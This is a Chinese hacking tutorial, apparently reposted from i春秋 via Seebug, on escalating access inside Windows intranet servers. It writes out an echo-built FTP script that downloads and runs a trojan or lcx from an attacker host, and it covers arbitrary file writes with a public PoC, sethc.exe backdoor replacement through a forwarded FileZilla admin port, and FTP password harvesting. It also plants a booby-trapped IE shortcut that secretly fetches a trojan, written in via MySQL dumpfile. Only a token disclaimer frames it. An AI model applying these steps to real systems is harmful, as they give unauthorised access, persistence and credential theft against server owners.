本文來自i春秋作者:Binghe

目錄

0x01 內網sa低權、內網注入點可os-shell情況適用

0x02 同第一個問題,但是站、庫一體

0x03 目錄權限的猥瑣利用

0x04 FTP的一些利用方式

0x05 快捷方式調用powershell隱藏執行命令

0x01 內網sa低權、內網注入點可os-shell情況適用

(后者情況如是站褲分離,則目標機為數據庫服務器)

mysql或許可以分割hex導出一個shell或lcx上去,mssql則不能 那么可以選擇ftp,那么就會有人問你不是nc反彈的交互式,如何輸入ftp密碼?

其實可以批量執行,echo追加寫文件,稱為ftp下載者 先在外網搭建個ftp,帳號密碼123,根目錄放lcx或者是你的遠控exe

echo open Ftp-ip>ftp.TXT //連接FTP
echo 123>>ftp.TXT?????? //輸入用戶名
echo 123>>ftp.TXT?????? //輸入密碼
echo get lcx c:lcx.exe>>ftp.TXT //執行下載命令
echo bye>>ftp.TXT???????????? //退出
ftp -s:ftp.txt??????????????? //執行FTP.TXT文件中的FTP命令

然后你懂得 可以直接在下載到的路徑運行你的muma或者lcx

0x02 同第一個問題,但是站、庫一體

目標是web服務,當然可以用以上方法直接上服務器,但是問題來了,如果你的東西不免殺,或者他的ftp不可用咋辦。 退而求其次,可以嘗試echo往web目錄shell,問題又來了,你沒有web物理路徑。 路徑可以通過搜索文件得到,主頁右鍵看源碼得到一個生僻的js文件

dir /s/b 驅動器號:\example.js

驅動器ABCDEFG隨便試試如果存在,會返回一個具體的絕對路徑

接下來的事就不必多說了,雙引號不影響腳本使用

0x03 目錄權限的猥瑣利用

比較累,不細說。拿到shell,可執行,但權限死,各種不成功可以試試微軟的那個寫入任意任意文件夾的0day,補丁就算了。

poc:https://github.com/monoxgas/Trebuchet

用法

Trebuchet.exe D:\1.txt c:\web\binghesec.asp

win8.1+net4.0測試效果(目錄我已經設置了sys權限)

你也許會認為:“那又怎么樣?你只是可以寫入任意文件而已。 那我也只能呵呵 那么我們可不可以來個lpk.dll劫持?可不可以。。。 那么某些情況下的跨目錄旁站寫shell豈不是輕而易舉?

0x04 FTP的一些利用方式

拿到shell后,權限很死,提權一籌莫展,程序的安裝目錄雖不可修改但可以訪問,還可以下載。

如果遇到ftp等字眼,也許這就是轉機。

  1. ServU和G6 FTP這類的數據庫有默認口令,有時候還可以看配置文件,或者反編譯servuadmin.exe得到口令,可以間接執行命令,不再多說。
  2. filezilla這類ftp服務一般不允許外部IP連接,可以把lcx端口轉出來再連接(他的默認服務端口是14147)。把整個目錄打包到本地,避免版本錯誤。

自己的vps執行:

lcx.exe -l 3333 4444

再將服務端的14147端口轉發到lcx監聽的3333端口上,可以用腳本 ,也可以用lcx

在vps上打開打包的Filezilla,連接端口4444,連上之后就相當于在他服務器上打開ftp一樣,現在來創建個C盤的ftp服務,然后上傳一個你改寫的sethc.exe替換c:\windows\system32目錄的sethc.exe,然后你懂得

3.flashfxp這類的FTP服務,雖可以配置文件看到密碼,但是可以整個軟件目錄打包到本地,然后打開用星號查看器得到密碼,這個服務也許權限不太高,但有可能用來爆破其他服務的密碼。

0x05 最近比較火的一種新型的攻擊方式,快捷方式調用powershell隱藏執行命令

已有利用工具,來自俄羅斯的黑闊,感謝吐司大牛分享出來。

url一欄是打開快捷方式時私密打開的程序,最后一欄是前臺打開的程序,其他任意,圖標可更換 看下效果,果然生猛!

你可以用他惡作劇,我們來用他提權。 url填木馬地址,start process填ie瀏覽器的或者其他桌面的圖標,生成之后,替換桌面,然后。。。。 有的小伙伴就會問了,能替換到桌面圖標了,權限就夠高了,還提權干嘛,我說:低權限請參考本文0x03 另外我們可以結合mysql的導出功能,當udf失敗時可以用,現在高版本的mysql都不能udf提權了,我給大家做個例子 生成快捷方式之后存在本機磁盤,例:e:\IE

然后

select hex(load_file('e:/ie')) into dumpfile 'e:/1.txt';

打開e:\1.txt,復合里面16進制內容的code 然后在目標的mysql執行

select 0x(code,不需要括號) into dumpfile '目標桌面的IE快捷方式路徑';

這樣。當管理員在服務器開IE時,就。。。,

總結:

滲透測試所遇情況千變萬化,哪里有真正的總結 僅作測試,請勿非法攻擊。

本文由i春秋學院提供:http://bbs.ichunqiu.com/thread-10718-1-1.html?from=paper

Paper 本文由 Seebug Paper 發布,如需轉載請注明來源。本文地址:http://www.bjnorthway.com/32/